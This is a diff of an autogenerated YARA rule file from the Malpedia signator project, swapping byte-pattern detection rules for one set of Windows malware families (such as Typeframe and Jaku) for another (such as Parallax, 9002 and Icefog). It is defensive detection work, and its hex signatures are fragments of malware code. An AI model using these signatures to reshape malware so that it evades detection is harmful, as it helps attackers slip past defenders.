+		$sequence_4 = { 8bd0 ad 8bc8 83e908 66ad 6685c0 740c }
+		$sequence_5 = { 8d7c38fc baffffffff 83c704 57 }
+		$sequence_6 = { 66ad 6685c0 740c 25ff0f0000 03c2 034508 }
+		$sequence_7 = { 52 e8???????? 59 8b09 8bd1 }
+		$sequence_8 = { c1e202 03d3 8b12 03d0 }
+		$sequence_9 = { 8b5508 8b4204 0fb70a 50 51 807401ff97 }
 
 	condition:
-		7 of them and filesize < 464896
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Typeframe_Auto : FILE
+rule MALPEDIA_Win_Icefog_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "54b5c61d-baac-5ee7-bf22-feb7211e94de"
+		id = "5a2327d1-90cc-5721-943f-064b1c43e2e0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.typeframe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.typeframe_auto.yar#L1-L148"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.icefog_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "80d5f324e45f06373a108fe4a18abca87604cdaaeb894c2ac4120a591e037164"
+		logic_hash = "ccfebce12d112e2d237d6de3048b8cc676f213fd05f617884709a0f4f9ea859a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109635,96 +109830,32 @@ rule MALPEDIA_Win_Typeframe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 004fb5 0500cccccc cc 48895c2410 }
-		$sequence_1 = { 002d???????? b505 00eb b405 }
-		$sequence_2 = { 004775 0300 3c75 0300 }
-		$sequence_3 = { 0026 b505 004fb5 0500cccccc }
-		$sequence_4 = { 006a0f 57 8bf0 e8???????? }
-		$sequence_5 = { 0004af 0300 f6ae0300e8ae 0300 }
-		$sequence_6 = { 01442468 8d4c0f78 83e978 8d44242c }
-		$sequence_7 = { 0056e5 0400 af e504 }
-		$sequence_8 = { 0102 0318 18040506071818 1818 }
-		$sequence_9 = { 008601010000 0fb69601010000 410fb60c30 0fb60432 }
-		$sequence_10 = { 0108 83c004 4a 75cd }
-		$sequence_11 = { 014424fc 83ec04 2bc1 58 0f83be000000 }
-		$sequence_12 = { 008501010000 410fb60c28 0fb69501010000 0fb6042a }
-		$sequence_13 = { 01442408 c74424fc00000000 014c24fc 83ec04 }
-		$sequence_14 = { 01442418 8d6c282c 83ed2c eb04 }
-		$sequence_15 = { 014424fc 83ec04 2bc2 58 720c }
-
-	condition:
-		7 of them and filesize < 2125824
-}
-rule MALPEDIA_Win_Jaku_Auto : FILE
-{
-	meta:
-		description = "autogenerated rule brought to you by yara-signator"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5711a497-d28d-5b3a-91bd-62abf5157c12"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jaku_auto.yar#L1-L277"
-		license_url = "N/A"
-		logic_hash = "bc36249d8d7142a776a25d525229620582afb8014b8d26d03d6dad8843321c84"
-		score = 75
-		quality = 73
-		tags = "FILE"
-		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 3945f8 0f94c0 eb02 32c0 }
-		$sequence_1 = { 8bcf 83e107 d3eb 2bf9 895df4 83ff20 }
-		$sequence_2 = { b83c800000 e8???????? 53 56 57 6a38 8d45c4 }
-		$sequence_3 = { 33db 894618 895df4 c70601000000 e9???????? 8b4620 }
-		$sequence_4 = { 83c204 8bfa d3e7 8b4e14 6609beb8160000 }
-		$sequence_5 = { 7573 8bc3 83e00f 3c08 0f85a6000000 8b4624 83ef04 }
-		$sequence_6 = { 880c07 8b02 8a4df8 884c0701 8b0a 8bc6 2bc1 }
-		$sequence_7 = { 2bf8 83c410 85ff 7fd7 5b 56 }
-		$sequence_8 = { 68???????? ff15???????? c3 b8???????? e8???????? 83ec2c }
-		$sequence_9 = { ff742408 e8???????? c20800 8bc1 }
-		$sequence_10 = { 53 68000000a0 6a03 53 }
-		$sequence_11 = { 7507 b800308000 eb02 33c0 }
-		$sequence_12 = { 7508 83c8ff e9???????? 8b839f830000 }
-		$sequence_13 = { 6a01 03c3 68???????? 50 e8???????? 83c40c }
-		$sequence_14 = { 5b c3 55 8bec 833d????????00 53 56 }
-		$sequence_15 = { 55 56 57 6880020000 }
-		$sequence_16 = { 75dd 57 e8???????? 59 }
-		$sequence_17 = { 0245fd 3245fe 8a4dff d2c8 }
-		$sequence_18 = { 50 e8???????? 59 8b4e2c }
-		$sequence_19 = { 85ff 897c240c 750c 5f 5e b801000000 5b }
-		$sequence_20 = { 56 e8???????? 59 8b4620 }
-		$sequence_21 = { e8???????? 59 eb57 53 }
-		$sequence_22 = { 016c242c 8b44242c 5f 5e 5d }
-		$sequence_23 = { 50 894528 e8???????? 83c410 8b3d???????? 53 }
-		$sequence_24 = { 53 53 53 6aff ff7528 bee9fd0000 }
-		$sequence_25 = { 56 57 8965f0 33ff 897dfc c645fc01 837d1c10 }
-		$sequence_26 = { 8bbe9b830000 33db 8d4f01 43 }
-		$sequence_27 = { 6a00 8b9580faffff 837a3000 750b 8b8db4f9ffff 83c904 eb06 }
-		$sequence_28 = { 6a00 53 56 e8???????? 83c41c 8b55f8 8345f8ff }
+		$sequence_0 = { 895de0 c745e400ff0000 e9???????? 8b5e04 c1e310 895de0 c745e40000ff00 }
+		$sequence_1 = { e8???????? 8b759c 53 c60300 e8???????? 8b45b4 83c404 }
+		$sequence_2 = { 8b4d0c 50 51 e8???????? 83c408 8bf0 5e }
+		$sequence_3 = { c6470300 8b7d08 75a0 8b5d0c 8b45f4 015f0c 5f }
+		$sequence_4 = { b807000000 5b 8be5 5d c3 8945fc 394604 }
+		$sequence_5 = { 8b4dfc 50 51 e8???????? 56 8947f6 e8???????? }
+		$sequence_6 = { c3 56 57 e8???????? 83c408 894590 85c0 }
+		$sequence_7 = { dd8570feffff dec3 d9ca dd9560feffff d8d1 dfe0 ddd9 }
+		$sequence_8 = { a1???????? 891490 8b0d???????? 42 3bd1 7ced a1???????? }
+		$sequence_9 = { 8b4508 85c0 7416 56 8b7010 50 e8???????? }
 
 	condition:
-		7 of them and filesize < 2220032
+		7 of them and filesize < 1187840
 }
-rule MALPEDIA_Win_Spica_Auto : FILE
+rule MALPEDIA_Win_Mole_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fb7e9642-1902-5334-b719-e15942756229"
+		id = "95af4ae3-464a-5d8e-afd4-0a11f6d0106b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spica"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spica_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mole_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "ed495be78d555972a0dc5475fda2591b6a4e5ced1e014a8ddb16a1315155952a"
+		logic_hash = "8a4687261d47d17fe0f3216955f42cc9f1da6596391fc3e1935f901a9405d6fa"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109738,34 +109869,34 @@ rule MALPEDIA_Win_Spica_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f3410f6f9798080000 f3410f6f9fa8080000 660f7f9b20040000 660f7f9310040000 660f7f8b00040000 660f7f83f0030000 41c687a409000001 }
-		$sequence_1 = { f30f7f01 e9???????? 4883fe08 488b4c2470 480f42ce 488b5c2430 4829d9 }
-		$sequence_2 = { ff15???????? 4885c0 0f84d9050000 4889c1 488905???????? 41b880000000 31d2 }
-		$sequence_3 = { eb1b 4d8b8590000000 b800020000 4c234658 b940020000 0f44c1 4533db }
-		$sequence_4 = { e8???????? 488d95b0000000 4889d9 e8???????? 440fb7f8 0fb74b58 4189cc }
-		$sequence_5 = { ff5018 4d89fd 84c0 7424 e9???????? 0f854f060000 4c89f1 }
-		$sequence_6 = { ff15???????? 488b0b 488b93a0000000 4885d2 741b 0fb783c0000000 3bf0 }
-		$sequence_7 = { 8b442458 4863cb 448bf3 4903cf 4863e8 48c1e520 ffc3 }
-		$sequence_8 = { ffc7 4983c670 3b7d00 7cab 4c8b742448 488b5c2440 488b6c2450 }
-		$sequence_9 = { ffc1 f7f1 418bc1 8bcd 442bc2 33d2 41f737 }
+		$sequence_0 = { e9???????? 81bdf0fdffffc7a4d005 0f846a6a0000 81bdf0fdffffcba4d005 0f8478790000 e9???????? 81bdf0fdffffd0a6d005 }
+		$sequence_1 = { 8d85f0ebffff 03c1 8b8d14e5ffff 50 8b8530e5ffff 8b048578f64100 }
+		$sequence_2 = { ff15???????? c745f800000000 c745fc00000000 6a00 6a18 68???????? }
+		$sequence_3 = { 52 ff15???????? 83c41c 6a01 8d85ecf0ffff 50 }
+		$sequence_4 = { 0f873b5a0000 8b8df0fdffff 0fb69130cd4000 ff249518cd4000 8b85f0fdffff }
+		$sequence_5 = { 898570faffff 83bd70faffffff 7431 6a00 8d8d44faffff 51 8b955cfaffff }
+		$sequence_6 = { 83bde8feffff02 750c c785dcfeffff07000000 eb46 83bde4feffff06 7515 83bde8feffff03 }
+		$sequence_7 = { 0fb6822cb64000 ff24850cb64000 81bdf0fdffff596ad005 7746 81bdf0fdffff596ad005 0f848d5a0000 }
+		$sequence_8 = { 7d0d 8a441918 888168c44100 41 ebe8 }
+		$sequence_9 = { 0f8473590000 e9???????? 81bdf0fdffffc360d305 7725 81bdf0fdffffc360d305 }
 
 	condition:
-		7 of them and filesize < 14034944
+		7 of them and filesize < 297984
 }
-rule MALPEDIA_Win_Red_Gambler_Auto : FILE
+rule MALPEDIA_Win_Naplistener_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "424f410a-a1db-5f80-8bc0-d2770de1bebd"
+		id = "a3d7d9df-de3a-516e-b81c-c3cfa9ffc96f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.red_gambler_auto.yar#L1-L298"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.naplistener"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.naplistener_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "b3fef0f5439e9ff88d33fd6c22b22c41979ab9321c0a109b616fbbcd9f2274a0"
+		logic_hash = "2510a61e053aa5f210d742699c248976270de6ea89c8a2ddd06d921dbbb47612"
 		score = 75
-		quality = 71
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -109777,54 +109908,32 @@ rule MALPEDIA_Win_Red_Gambler_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6800010000 8d440601 50 68???????? e9???????? 68???????? }
-		$sequence_1 = { 55 8bec 837d0c10 56 57 }
-		$sequence_2 = { 8d55fc 52 56 6a00 6880000000 6a02 ffd7 }
-		$sequence_3 = { 33db 68ff000000 8d44244d 53 }
-		$sequence_4 = { 8b1d???????? 8da42400000000 6a00 68???????? ffd3 }
-		$sequence_5 = { ff15???????? 85c0 7520 8b542418 52 8d84243c010000 }
-		$sequence_6 = { 33c8 03ff 03ff 83e1f0 }
-		$sequence_7 = { 90 57 8d95fcfeffff 52 }
-		$sequence_8 = { 52 ff15???????? 8d8594fbffff 50 }
-		$sequence_9 = { 7f6f c8603a0c 7364 42 e5e1 5f }
-		$sequence_10 = { 3d067c263c 3c3d 9e e7bd }
-		$sequence_11 = { 6800010000 8d8dfcfdffff 51 6a00 }
-		$sequence_12 = { 64f33c87 3cfb 3ccd 047e 0000 3e2a6616 2bb0775ea707 }
-		$sequence_13 = { ff15???????? 83c414 6a00 6a00 8d9598fbffff }
-		$sequence_14 = { 8d8594fbffff 50 8d4d98 51 ff15???????? }
-		$sequence_15 = { 2bb0775ea707 2d9e2b3706 d7 e8???????? 004f21 7ea2 }
-		$sequence_16 = { 6800010000 8d85fcfeffff 50 6a00 ff15???????? }
-		$sequence_17 = { 68???????? 8d8d98fbffff 68???????? 51 }
-		$sequence_18 = { 8d9598fbffff 52 68???????? 6a00 6a00 ff15???????? 8b4dfc }
-		$sequence_19 = { 2b2a bee7eee947 7c26 0e 6706 7e0e 2829 }
-		$sequence_20 = { 8d5598 52 8d8598fdffff 50 68???????? 8d8d98fbffff }
-		$sequence_21 = { 6800010000 8d8d98fdffff 51 8d9598feffff }
-		$sequence_22 = { 74be 6f 665b e17a 6c 8737 27 }
-		$sequence_23 = { 4c 48 44 40 }
-		$sequence_24 = { 6e 44 b11a dfaf4e71ac05 }
-		$sequence_25 = { ff96bcd60000 83c704 8d5efc 31c0 }
-		$sequence_26 = { ffd3 68???????? 56 8bf8 ffd3 8bd8 ffd7 }
-		$sequence_27 = { ff15???????? 40 68???????? 50 ff15???????? 8d8dfcfeffff }
-		$sequence_28 = { a1???????? a3???????? a1???????? c705????????6b214000 8935???????? a3???????? }
-		$sequence_29 = { c1f805 c1e606 033485c0974000 8b45f8 }
-		$sequence_30 = { 85f6 0f8492000000 8b1d???????? 68???????? }
-		$sequence_31 = { f2ae 55 ff96acd60000 09c0 7407 8903 83c304 }
+		$sequence_0 = { 18 8d01000001 1316 1116 16 110a }
+		$sequence_1 = { 38bbfdffff 1314 00 7251010070 }
+		$sequence_2 = { 7285000070 0c 06 6f0e00000a }
+		$sequence_3 = { 110c 110b 1110 6f2600000a }
+		$sequence_4 = { 6f2600000a 00 1106 6f2700000a 732800000a 1311 1111 }
+		$sequence_5 = { 00 de3a 00 1107 14 fe01 }
+		$sequence_6 = { 6f2700000a 1307 1107 09 16 09 8e }
+		$sequence_7 = { 110e 1110 18 8d01000001 }
+		$sequence_8 = { 281900000a 1109 6f1a00000a 130a 7283000070 1105 6f1b00000a }
+		$sequence_9 = { 06 6f3b00000a 16 fe01 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 50176
 }
-rule MALPEDIA_Win_Zlob_Auto : FILE
+rule MALPEDIA_Win_Parallax_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "05847610-c838-5d32-b338-8d5b68ddc2fc"
+		id = "8bc5e4c5-7297-58f6-93c7-d7e053396899"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zlob"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zlob_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.parallax_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "540ffbf034a9c137ad7d038d10b65fce4aa537a82bbe9b720e7907a3d6dfd9c7"
+		logic_hash = "048041cd9476ccea336d154c3ff8a8cb0591d12b8f4809a446240e8afe220643"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109838,34 +109947,34 @@ rule MALPEDIA_Win_Zlob_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8944241c c70424e8030000 e9???????? ffd3 ffd3 ffd6 }
-		$sequence_1 = { 0f8436010000 ffd5 ffd5 ffd6 ffd7 }
-		$sequence_2 = { ffd7 ffd6 ffd7 ffd6 ffd6 ffd7 8d842440020000 }
-		$sequence_3 = { 50 ffd6 85c0 750d 6a08 6a01 57 }
-		$sequence_4 = { c685f5fdffff31 c685f6fdffff65 c685f7fdffff30 c685f8fdffff2d c685f9fdffff64 c685fafdffff65 }
-		$sequence_5 = { 8d4c242c e8???????? 8b442448 89442410 eb05 834c2410ff 8d4c241c }
-		$sequence_6 = { 742e 6a03 ff75f0 ff15???????? 85c0 751f 6a03 }
-		$sequence_7 = { c644241301 ff742414 ff15???????? 8b3d???????? ff742418 ff15???????? }
-		$sequence_8 = { 6a0c a3???????? e8???????? 59 85c0 }
-		$sequence_9 = { 895104 e8???????? c20400 56 57 8b7c240c 8bc7 }
+		$sequence_0 = { ff96fc000000 6a04 68???????? 6a0a 68???????? e8???????? 6a04 }
+		$sequence_1 = { 837d0801 7548 8d35f4ec4000 8d3d04f14000 b908020000 f3a4 6a04 }
+		$sequence_2 = { ff7634 52 ff750c e8???????? 6a00 ff750c ff7508 }
+		$sequence_3 = { 3d02800000 7510 ff7514 ff7510 e8???????? e9???????? 3d03800000 }
+		$sequence_4 = { 5d c20c00 55 8bec 8b7d08 }
+		$sequence_5 = { 5d c20800 e8???????? 5e 662bf6 8b15???????? 3315???????? }
+		$sequence_6 = { 895f1c 8bc3 5f 5e 8be5 5d c20800 }
+		$sequence_7 = { 89463c 68ff1f0000 e8???????? 8b563c }
+		$sequence_8 = { ff751c 8f4614 ff7520 8f461c 5d c21c00 }
+		$sequence_9 = { 8b4648 8945f4 ff75f8 ff75f0 ff75f4 e8???????? eb28 }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Unidentified_106_Auto : FILE
+rule MALPEDIA_Win_9002_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ea4969ee-e7d3-51c5-a790-866750e5961b"
+		id = "bbbd19a8-8d59-5fa3-924d-0a65e7bf4ff6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_106"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_106_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.9002_auto.yar#L1-L337"
 		license_url = "N/A"
-		logic_hash = "d6bc870d9f53493eb97d63e12993bef0e39d6447b53eae3a48dc5e8a9f09d6c4"
+		logic_hash = "b28ab37244f22455bfd7ab977eaff5de257e54ee69c7d856b3cc5dc49768b368"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -109877,32 +109986,60 @@ rule MALPEDIA_Win_Unidentified_106_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff5040 89442440 85c0 780a c783f000000001000000 8b442440 4883c420 }
-		$sequence_1 = { ba64000c00 488bcf 4c8be8 ff96c0000000 4885c0 750d bfeaffffff }
-		$sequence_2 = { 83e27f 8d0432 413bc4 0f87e0fbffff 83fa04 0f87d7fbffff 85d2 }
-		$sequence_3 = { ffc0 4883c110 413bc5 72f0 33c9 e8???????? 488b4c2448 }
-		$sequence_4 = { e8???????? 488d9424f0000000 498bce e8???????? 488d4c2420 e8???????? 41b820000000 }
-		$sequence_5 = { 8bea 448b895c010000 448be2 412bf1 488bd9 2bee 85f6 }
-		$sequence_6 = { c7470801000000 0f57c0 4889442470 0f57c9 48896c2440 41b00b 48896c2448 }
-		$sequence_7 = { 85c0 7531 0fb7833c040000 6683e030 6683f810 7509 c683470400000a }
-		$sequence_8 = { 8b4a04 394c2460 7507 beffffffff eb62 ba07000300 48896c2478 }
-		$sequence_9 = { 7519 488d0598730800 c7450403000000 48898590000000 32c0 eb1f 488b5308 }
+		$sequence_0 = { 2d00040000 f7d8 1bc0 23c2 }
+		$sequence_1 = { 68???????? ff15???????? 6a0a ff15???????? e9???????? }
+		$sequence_2 = { 89bef8030000 ff15???????? 8986fc030000 ff15???????? 898600040000 }
+		$sequence_3 = { 83c0fc 50 53 e8???????? }
+		$sequence_4 = { 03c3 8b00 5b ffd0 }
+		$sequence_5 = { 6a02 83c144 6800000040 51 }
+		$sequence_6 = { 8bc1 33c9 894808 894810 8910 c7400c01000000 }
+		$sequence_7 = { 57 8bf1 50 6801020000 c706???????? e8???????? 8d4604 }
+		$sequence_8 = { 2bd0 3bfa 760d 85c0 7504 }
+		$sequence_9 = { 6a02 ff15???????? 68???????? ff15???????? 6a00 6a00 6a00 }
+		$sequence_10 = { 0ac8 80c910 880e 8ac2 }
+		$sequence_11 = { 6a02 6a03 6a00 e8???????? }
+		$sequence_12 = { 8b5c2408 6bdb08 03c3 8b00 }
+		$sequence_13 = { 33c9 3bc8 1bd2 f7da 8915???????? }
+		$sequence_14 = { 682c010000 50 ffd3 3d02010000 }
+		$sequence_15 = { 51 e8???????? 6a06 6a01 6a02 e8???????? }
+		$sequence_16 = { 8b08 51 e8???????? 8b5714 }
+		$sequence_17 = { 8b460c 40 33d2 f77614 ff4610 }
+		$sequence_18 = { e8???????? 50 e8???????? 6a08 e8???????? }
+		$sequence_19 = { 46 c1ea06 8816 46 }
+		$sequence_20 = { 56 89442418 ff15???????? a820 }
+		$sequence_21 = { 8b01 ff5010 8b7614 ff4e0c }
+		$sequence_22 = { c7422c00000200 8b4648 c7402801000000 8b4648 }
+		$sequence_23 = { 742e 85f6 7419 0fb6da f683c1d4001004 7406 8816 }
+		$sequence_24 = { 7622 8b4558 83f805 7316 8a0b }
+		$sequence_25 = { 8b7c240c 57 8bf1 e8???????? 33d2 }
+		$sequence_26 = { 894608 ff15???????? 8d4c2414 885c243c ff15???????? 8bc6 8b4c2434 }
+		$sequence_27 = { 8b4648 689a000000 6a00 50 }
+		$sequence_28 = { 8d4c240c 8d542418 6a05 8944241c 51 }
+		$sequence_29 = { 8bf1 8b4610 57 33ff 897e08 }
+		$sequence_30 = { 8bf8 6a40 6800100000 57 6a00 ff15???????? 8d4df8 }
+		$sequence_31 = { c3 b8???????? c705????????772b0010 a3???????? }
+		$sequence_32 = { ff15???????? 8bf8 85ff 7529 ff15???????? 8b560c 52 }
+		$sequence_33 = { 8b5c247c 55 56 8bb4248c000000 57 8b3b 8b2e }
+		$sequence_34 = { 52 ffd5 c7460c00000000 8b460c }
+		$sequence_35 = { 6689bc5a80010000 83c30c 895c2424 e9???????? }
+		$sequence_36 = { 8b4e04 83c108 33f6 668931 66897102 89510c }
+		$sequence_37 = { ff15???????? 8bf8 6a40 6800100000 }
 
 	condition:
-		7 of them and filesize < 27402240
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Ketrum_Auto : FILE
+rule MALPEDIA_Win_Smac_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1ff13c8d-0527-5a40-b6b9-bb4141259de3"
+		id = "aa200520-854b-5bad-b989-05c108d9a8dd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrum"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ketrum_auto.yar#L1-L171"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.smac_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "2f5239fe4e1f5d031309de047f066345a22c976ad71c9c05f830bcb3f0899bfb"
+		logic_hash = "048e342bef93bb6d74cc2ec6d93a75375cb38005feab23ff54823997fa4e630f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109916,38 +110053,32 @@ rule MALPEDIA_Win_Ketrum_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a08 40 3acb 75f9 52 ff74241c 2bc7 }
-		$sequence_1 = { 6a00 50 e8???????? 8d85fcefffff 83c418 }
-		$sequence_2 = { 8bf7 83e61f c1e606 033485a0bc6200 c745e401000000 }
-		$sequence_3 = { 68???????? 50 ffd7 83c43c 53 53 }
-		$sequence_4 = { 85c0 7549 ff15???????? 8bf0 56 68???????? }
-		$sequence_5 = { ba???????? 898df0d3ffff 3bc7 7321 8995f0d3ffff }
-		$sequence_6 = { 894dd4 8945d8 eb06 215dd4 215dd8 }
-		$sequence_7 = { 58 b9???????? e8???????? 59 57 68???????? e8???????? }
-		$sequence_8 = { 68???????? 50 ff15???????? ffb534fdffff 8d8de0fdffff ffb52cfdffff e8???????? }
-		$sequence_9 = { 68???????? 8d4da8 e8???????? 59 84c0 }
-		$sequence_10 = { e8???????? 8b450c 8b5d08 33c9 }
-		$sequence_11 = { ff15???????? 898350010000 80bd33efffff00 0f84e3f2ffff }
-		$sequence_12 = { 7503 6a09 59 66890e eb03 668916 830002 }
-		$sequence_13 = { 898d34efffff 6a00 ffb534efffff 83c8ff }
-		$sequence_14 = { 50 8db578fdffff e8???????? 8bc6 50 8d85a0fbffff 50 }
-		$sequence_15 = { 8d458c 50 c645fc03 e8???????? 59 }
+		$sequence_0 = { 59 59 8bd8 8d8514f1ffff c645fc16 e8???????? 6a01 }
+		$sequence_1 = { ffd6 8d45e0 50 ff35???????? c745e04d6f7665 c745e446696c65 c745e845785700 }
+		$sequence_2 = { c3 8bff 55 8bec 8b4508 56 8d34c5d0504100 }
+		$sequence_3 = { 668985fcfeffff 668985fefeffff 58 6a5c 66898500ffffff 58 6a63 }
+		$sequence_4 = { 33c0 668985f0efffff 8d8504f1ffff 50 8d85c0efffff 50 56 }
+		$sequence_5 = { 6aff ff7508 bbe9fd0000 50 53 ffd6 8bf8 }
+		$sequence_6 = { ff35???????? 66898d76ffffff c745a04765744d 66c745a46f64 c645a675 66c745a86546 c645aa69 }
+		$sequence_7 = { 58 6a5b 66894594 33c0 66894596 58 }
+		$sequence_8 = { 50 ffd6 53 6a07 8d8d34feffff 51 53 }
+		$sequence_9 = { 50 ff15???????? ffb568f4ffff ff15???????? 56 e8???????? 59 }
 
 	condition:
-		7 of them and filesize < 4599808
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Charon_Auto : FILE
+rule MALPEDIA_Win_Taintedscribe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "01b8556c-ee40-53b7-952a-8e2b8282fe20"
+		id = "f6a7e40a-4fa2-5a81-9780-0a7ba8af1fba"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.charon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.charon_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.taintedscribe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.taintedscribe_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "b28dd8515b960c3adbfdc7b51b8085f45af8b6d7308fa151efcf52d4fa2fa9ad"
+		logic_hash = "410c49d2a558db92d0096ecc5bd9fc38bcaad1e641a570b26cd7d6d98ec29d7e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109961,32 +110092,32 @@ rule MALPEDIA_Win_Charon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4c2420 8d0c8d01000000 4863c9 88440c50 b803000000 2b442420 4898 }
-		$sequence_1 = { 050b020000 8bc0 488b8c2460020000 8b0481 038424f8010000 8b8c24fc010000 8b942400020000 }
-		$sequence_2 = { 480bc1 48c1f802 4825ffffff01 b908000000 486bc901 488b542408 }
-		$sequence_3 = { 486bc000 488b8c2460020000 8b840140100000 c1e00a b904000000 486bc900 488b942460020000 }
-		$sequence_4 = { 48c1e108 480bc1 b901000000 486bc90e 488b542410 0fb60c0a 48c1e110 }
-		$sequence_5 = { c784249c00000000000000 8b0424 8b4c2408 03c8 }
-		$sequence_6 = { 488b942460020000 8b8c0a40100000 c1e916 0bc1 898424d8010000 b804000000 486bc00f }
-		$sequence_7 = { 050f020000 8bc0 488b8c2460020000 8b0481 03842438020000 8b8c243c020000 8b942440020000 }
-		$sequence_8 = { 0bc1 89442448 b804000000 486bc004 488b8c2460020000 0fb6840100100000 88442443 }
